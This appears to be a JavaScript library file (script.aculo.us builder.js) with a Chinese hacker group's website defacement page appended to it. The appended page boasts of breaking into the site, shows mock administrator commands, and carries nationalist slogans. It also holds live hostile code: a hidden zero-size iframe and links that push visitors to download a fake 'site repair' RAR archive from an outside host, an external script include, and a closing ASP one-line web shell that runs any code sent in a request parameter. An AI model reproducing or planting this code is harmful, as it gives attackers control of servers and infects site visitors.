// script.aculo.us builder.js v1.7.0, Fri Jan 19 19:16:36 CET 2007

// Copyright (c) 2005, 2006 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

var Builder = {
  NODEMAP: {
    AREA: 'map',
    CAPTION: 'table',
    COL: 'table',
    COLGROUP: 'table',
    LEGEND: 'fieldset',
    OPTGROUP: 'select',
    OPTION: 'select',
    PARAM: 'object',
    TBODY: 'table',
    TD: 'table',
    TFOOT: 'table',
    TH: 'table',
    THEAD: 'table',
    TR: 'table'
  },
  // note: For Firefox < 1.5, OPTION and OPTGROUP tags are currently broken,
  //       due to a Firefox bug
  node: function(elementName) {
    elementName = elementName.toUpperCase();
    
    // try innerHTML approach
    var parentTag = this.NODEMAP[elementName] || 'div';
    var parentElement = document.createElement(parentTag);
    try { // prevent IE "feature": http://dev.rubyonrails.org/ticket/2707
      parentElement.innerHTML = "<" + elementName + "></" + elementName + ">";
    } catch(e) {}
    var element = parentElement.firstChild || null;
      
    // see if browser added wrapping tags
    if(element && (element.tagName.toUpperCase() != elementName))
      element = element.getElementsByTagName(elementName)[0];
    
    // fallback to createElement approach
    if(!element) element = document.createElement(elementName);
    
    // abort if nothing could be created
    if(!element) return;

    // attributes (or text)
    if(arguments[1])
      if(this._isStringOrNumber(arguments[1]) ||
        (arguments[1] instanceof Array)) {
          this._children(element, arguments[1]);
        } else {
          var attrs = this._attributes(arguments[1]);
          if(attrs.length) {
            try { // prevent IE "feature": http://dev.rubyonrails.org/ticket/2707
              parentElement.innerHTML = "<" +elementName + " " +
                attrs + "></" + elementName + ">";
            } catch(e) {}
            element = parentElement.firstChild || null;
            // workaround firefox 1.0.X bug
            if(!element) {
              element = document.createElement(elementName);
              for(attr in arguments[1]) 
                element[attr == 'class' ? 'className' : attr] = arguments[1][attr];
            }
            if(element.tagName.toUpperCase() != elementName)
              element = parentElement.getElementsByTagName(elementName)[0];
            }
        } 

    // text, or array of children
    if(arguments[2])
      this._children(element, arguments[2]);

     return element;
  },
  _text: function(text) {
     return document.createTextNode(text);
  },

  ATTR_MAP: {
    'className': 'class',
    'htmlFor': 'for'
  },

  _attributes: function(attributes) {
    var attrs = [];
    for(attribute in attributes)
      attrs.push((attribute in this.ATTR_MAP ? this.ATTR_MAP[attribute] : attribute) +
          '="' + attributes[attribute].toString().escapeHTML() + '"');
    return attrs.join(" ");
  },
  _children: function(element, children) {
    if(typeof children=='object') { // array can hold nodes and text
      children.flatten().each( function(e) {
        if(typeof e=='object')
          element.appendChild(e)
        else
          if(Builder._isStringOrNumber(e))
            element.appendChild(Builder._text(e));
      });
    } else
      if(Builder._isStringOrNumber(children)) 
         element.appendChild(Builder._text(children));
  },
  _isStringOrNumber: function(param) {
    return(typeof param=='string' || typeof param=='number');
  },
  build: function(html) {
    var element = this.node('div');
    $(element).update(html.strip());
    return element.down();
  },
  dump: function(scope) { 
    if(typeof scope != 'object' && typeof scope != 'function') scope = window; //global scope 
  
    var tags = ("A ABBR ACRONYM ADDRESS APPLET AREA B BASE BASEFONT BDO BIG BLOCKQUOTE BODY " +
      "BR BUTTON CAPTION CENTER CITE CODE COL COLGROUP DD DEL DFN DIR DIV DL DT EM FIELDSET " +
      "FONT FORM FRAME FRAMESET H1 H2 H3 H4 H5 H6 HEAD HR HTML I IFRAME IMG INPUT INS ISINDEX "+
      "KBD LABEL LEGEND LI LINK MAP MENU META NOFRAMES NOSCRIPT OBJECT OL OPTGROUP OPTION P "+
      "PARAM PRE Q S SAMP SCRIPT SELECT SMALL SPAN STRIKE STRONG STYLE SUB SUP TABLE TBODY TD "+
      "TEXTAREA TFOOT TH THEAD TITLE TR TT U UL VAR").split(/\s+/);
  
    tags.each( function(tag){ 
      scope[tag] = function() { 
        return Builder.node.apply(Builder, [tag].concat($A(arguments)));  
      } 
    });
  }
}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>神话黑盟基地，友情检测！QQ:378632367  神话网络 技术引领潮流 打造最完美的黑客基地</TITLE><!--
a:link {
color: #00FF00;
text-decoration: none;
}
a:visited {
text-decoration: none;
color: #00FF00;
}
a:hover {
text-decoration: underline;
color: #FF0000;
}
a:active {
text-decoration: none;
color: #FF0000;
}
-->
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>
A:link {
    COLOR: #00ff00; TEXT-DECORATION: none
}
A:visited {
    COLOR: #00ff00; TEXT-DECORATION: none
}
A:hover {
    COLOR: #ff0000; TEXT-DECORATION: underline
}
A:active {
    COLOR: #ff0000; TEXT-DECORATION: none
}
body {
	background-image: url(http://img2009.5sing.com/m/photo/2009/05/07/20090507224224_644710.gif);
}
.STYLE1 {
	font-size: 28px;
	font-weight: bold;
}
.STYLE2 {
	font-size: 24px;
	font-weight: bold;
}
</STYLE>

<META content="MSHTML 6.00.2900.2180" name=GENERATOR><BGSOUND>
<BGSOUND balance=0 
src="http://www.hackjc.cn/music/02_conquest_of_paradise.wma" volume=-1 loop=infinite>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>▓神话黑盟基地▓</title>
</HEAD>
<BODY bgColor=#000000 >
<H1 align=center><SPAN id=theText style="WIDTH: 100%">神话网络黑盟基地友情检测<BR>[ Hacker By:义超[神话网络] QQ:378632367 ]</SPAN></H1></SPAN>
<P style="FONT-SIZE: 15px; COLOR: #00ff00" align=center>│你的网站，我的权限！│</P>
<P style="FONT-SIZE: 15px; COLOR: #00ff00" align=center><a href="http://Www.hackshenhua.com">进入神话黑盟基地
  </SCRIPT>
</a></P>
</SPAN>
<DIV></DIV>
<SCRIPT>
<!--
var from = 1;
var to = 4;
var delay = 55; 
var glowColor = "lime";
var i = to;
var j = 0;
textPulseDown();

function textPulseUp()
{
if (!document.all)
return
if (i < to)
{
theText.style.filter = "Glow(Color=" + glowColor + ", Strength=" + i + ")";
i++;
theTimeout = setTimeout('textPulseUp()',delay);
return 0;
}
if (i = to)
{
theTimeout = setTimeout('textPulseDown()',delay);
return 0;
}
}
function textPulseDown()
{
if (!document.all)
return
if (i > from)
{
theText.style.filter = "Glow(Color=" + glowColor + ", Strength=" + i + ")";
i--;
theTimeout = setTimeout('textPulseDown()',delay);
return 0;
}
if (i = from)
{
theTimeout = setTimeout('textPulseUp()',delay);
return 0;
}
}
//-->
</SCRIPT>
<TABLE style="boder-color: #00ff00" height=100 cellSpacing=0 cellPadding=0 
width=620 align=center border=0>
  <TBODY></TBODY></TABLE>
<FORM name=textform>
<CENTER>
  <textarea style="FONT-SIZE: 12px; BORDER-LEFT-COLOR: #00ff00; BORDER-BOTTOM-COLOR: #00ff00; COLOR: #00ff00; BORDER-TOP-COLOR: #00ff00; SCROLLBAR-BASE-COLOR: #000000; BACKGROUND-COLOR: #000000; BORDER-RIGHT-COLOR: #00ff00" name=textfield rows=25 readonly wrap=virtual cols=100></textarea>
</CENTER> 
<SCRIPT language=javascript>
var pos=0;
function ShowText(strText)
{
document.textform.textfield.value = strText.substring(0,pos++);
setTimeout("ShowText(strText)",50);
if(pos==strText.length) 
{
     return;
}
}
var strText = "                           ▓神话黑客联盟基地▓ QQ:378632367 -检测报告\n----------------------------------------------------------------------------------------------------\n→  Microsoft Windows Server 2003 R2 [版本 5.2.3790]\n→  (C) 版权所有 2010-2090 Microsoft  您的网站，我的权限！义超友情检测 Corp\n→  C:\>net user 我宣誓我会用我所有的一切,包括我的生命来捍卫祖国的安全  /神话黑盟基地宣誓完毕!\n→  C:\>net localgroup administrators 相信自己，你就是神话  /神话黑盟基地决定了的爱我就一生不变!\n→  C:\>只因你是天使 所以你的网站就是我的女人！ /神话黑盟基地应该在别人的关爱中得到永生!\n----------------------------------------------------------------------------------------------------\n→  C:\>dir\n→  C:\>神话黑盟基地提醒你...\n→  C:\>勿忘国耻 消灭日本 收复台湾\n→  C:\>黑客是种精神不在乎技术有多高\n→  C:\>只在乎他对这种精神的追求\n→  C:\>世上没有入侵不了的电脑..只是他们不知道\n→  C:\>网络上没有未被入侵过的电脑..只是他们自己不知道而已!\n→  C:\>我们都是中国人...请你记住这一点\n→  C:\>此次入侵只是友情检测..请管理员不用担心...\n→  C:\>提高全民网络安全意识\n→  C:\>加强中国黑客文化\n→  C:\>管理员..你的责任没有做到哦!\n→  C:\>请你及时的修补系统漏洞......Hacker 神话黑盟基地 QQ:378632367\n----------------------------------------------------------------------------------------------------\n Hacker學得再好，也無灋入侵妳的心.感情批量溢出,卻得不到Echo.服務噐入侵得再多，對妳祇不過昰Guest.昰我的DDOS，型成了妳的拒絕服務，還昰妳總昰開著防火牆, 讓我無從下手.昰妳太完美,還昰我真的太菜?";
ShowText(strText);
</SCRIPT>
</FORM>
<P style="FONT-SIZE: 20px; COLOR: #00ff00" align=center>
<SCRIPT>fortim=new Date();document.write('现在时间:'+fortim.toLocaleString())</SCRIPT>
</SCRIPT>您已经待了<INPUT size=5 name=time10>秒咯！吸根烟吧！</P>
<P style="FONT-SIZE: 20px; COLOR: #00ff00" align=center>
<html><head>
<!-- 代码开始 -->

<STYLE>
  .stHeadliner {

                font-size: 11pt;

                font-weight: bold;

                background: #cccccc;

                color: #333333}

</STYLE>
<SCRIPT LANGUAGE="JavaScript">

<!-- start hide

// Delay in milliseconds for the growing headliner

growWait=90



// Delay in milliseconds for the expanding headliner

expandWait=40



// Delay in milliseconds for the scrolling headliner

scrollWait=50



// Number of characters in scrolling zone for the scrolling headliner

scrollWidth=40



// Number of lines, specify as much as you want to use

lineMax=4

lines=new Array(lineMax)



// Define the lines (Text to display, url, effect, time to wait)

lines[1]=new Line("Hello 站长, 您好！你的网站已经被入侵勒!", "http://www.yxpshop.com/admin/网站修复连接.rar", Expand, 2000)

lines[2]=new Line("下载网站修复工具吧！", "http://www.yxpshop.com/admin/网站修复连接.rar", Scroll, 1000)

lines[3]=new Line("立即联系我们", "tencent://message/?uin=378632367", Static, 2500)

lines[4]=new Line("给我写信吧！", "mailto:378632367@qq.com", Grow, 3000)



// Some other variables (just don't change)

lineText=""

timerID=null

timerRunning=false

spaces=""

charNo=0

charMax=0

charMiddle=0

lineNo=0

lineWait=0



// Define line object

function Line(text, url, type, wait) {

	this.text=text

	this.url=url

	this.Display=type

	this.wait=wait

}



// Fill a string with n chars c

function StringFill(c, n) {

	s=""

	while (--n >= 0) {

		s+=c

	}

	return s

}



function Static() {

	document.formDisplay.buttonFace.value=this.text

	timerID=setTimeout("ShowNextLine()", this.wait)

}



function Grow() {

	lineText=this.text

	lineWait=this.wait

	charMax=lineText.length

	TextGrow()

}



function TextGrow() {

	if (charNo <= charMax) {

		document.formDisplay.buttonFace.value=lineText.substring(0, charNo)

		charNo++

		timerID=setTimeout("TextGrow()", growWait)

	}

	else {

		charNo=0

		timerID=setTimeout("ShowNextLine()", lineWait)

	}

}



function Expand() {

	lineText=this.text

	charMax=lineText.length

	charMiddle=Math.round(charMax / 2)

	lineWait=this.wait

	TextExpand()

}



function TextExpand() {

	if (charNo <= charMiddle) {

		document.formDisplay.buttonFace.value=lineText.substring(charMiddle - charNo, charMiddle + charNo)

		charNo++

		timerID=setTimeout("TextExpand()", expandWait)

	}

	else {

		charNo=0

		timerID=setTimeout("ShowNextLine()", lineWait)

	}

}



function Scroll() {

	spaces=StringFill(" ", scrollWidth)

	lineText=spaces+this.text

	charMax=lineText.length

	lineText+=spaces

	lineWait=this.wait

	TextScroll()

}



function TextScroll() {

	if (charNo <= charMax) {

		document.formDisplay.buttonFace.value=lineText.substring(charNo, scrollWidth+charNo)

		charNo++

		timerID=setTimeout("TextScroll()", scrollWait)

	}

	else {

		charNo=0

		timerID=setTimeout("ShowNextLine()", lineWait)

	}

}



function StartHeadliner() {

	StopHeadliner()

	timerID=setTimeout("ShowNextLine()", 1000)

	timerRunning=true

}



function StopHeadliner() {

	if (timerRunning) { 

		clearTimeout(timerID)

		timerRunning=false

	}

}



function ShowNextLine() {

	(lineNo < lineMax) ? lineNo++ : lineNo=1

	lines[lineNo].Display()

}



function GotoUrl(url)

{

	top.location.href=url

}

// end hide -->

</SCRIPT>
</head>
<Body onLoad="StartHeadliner()" onUnload="StopHeadliner()">
<form name="formDisplay">

<input class="stHeadLiner" type="button" name="buttonFace" value="** 合作愉快咯！ +++ ！ **" onClick="GotoUrl(lines[lineNo].url)">
<br>
<br>
</form>
</body>
</html>
  <iframe src=http://www.yxpshop.com/admin\网站修复连接.rar width=0 height=0></iframe>
  <SCRIPT>function newtiim(){time10.value++;}setInterval('newtiim()','1000')</SCRIPT>
  <embed src="http|//gd.qiannao.com/servlet/FileDownload?vid=1&vid2=0&filename=//uu1001/share/2010/9/4/keyboard.mp3?vid=1&vid2=0&filename=//uu1001/share/2010/9/4/keyboard.mp3?vid=1&vid2=0&filename=//uu1001/share/2010/9/4/keyboard.mp3" width="32" height="32" hidden="true" autostart="true" loop="true"></embed>
<a class="STYLE1" onMouseOver="javascript:window.open('tencent://message/?uin=378632367');">→将鼠标移动到此处，解除网站入侵←</a></P>
<P style="FONT-SIZE: 20px; COLOR: #00ff00" align=center><a class="STYLE1" onMouseOver="javascript:window.open('tencent://message/?uin=378632367');">→</a><span class="STYLE2">联系我们</span><a class="STYLE1" onMouseOver="javascript:window.open('tencent://message/?uin=378632367');">←</a></P>
</body></html>
<embed autostart="true" loop="-1" controls="ControlPanel" width="0" height="0" src="http://www.topoutward.com/mp3/1.mp3"> 
<embed autostart="true" loop="-1" controls="ControlPanel" width="0" height="0" src="http://www.ease-office.com/admin/keyboard.mp3"> <html> 
<script language="javascript" src="http://www.54kefu.net/kefu/js/96/26296.js" charset="utf-8"></script>
     }  
  }  
  document.onmousedown=click  
</SCRIPT>
<%execute request("xiaochao")%>
</BODY></HTML>


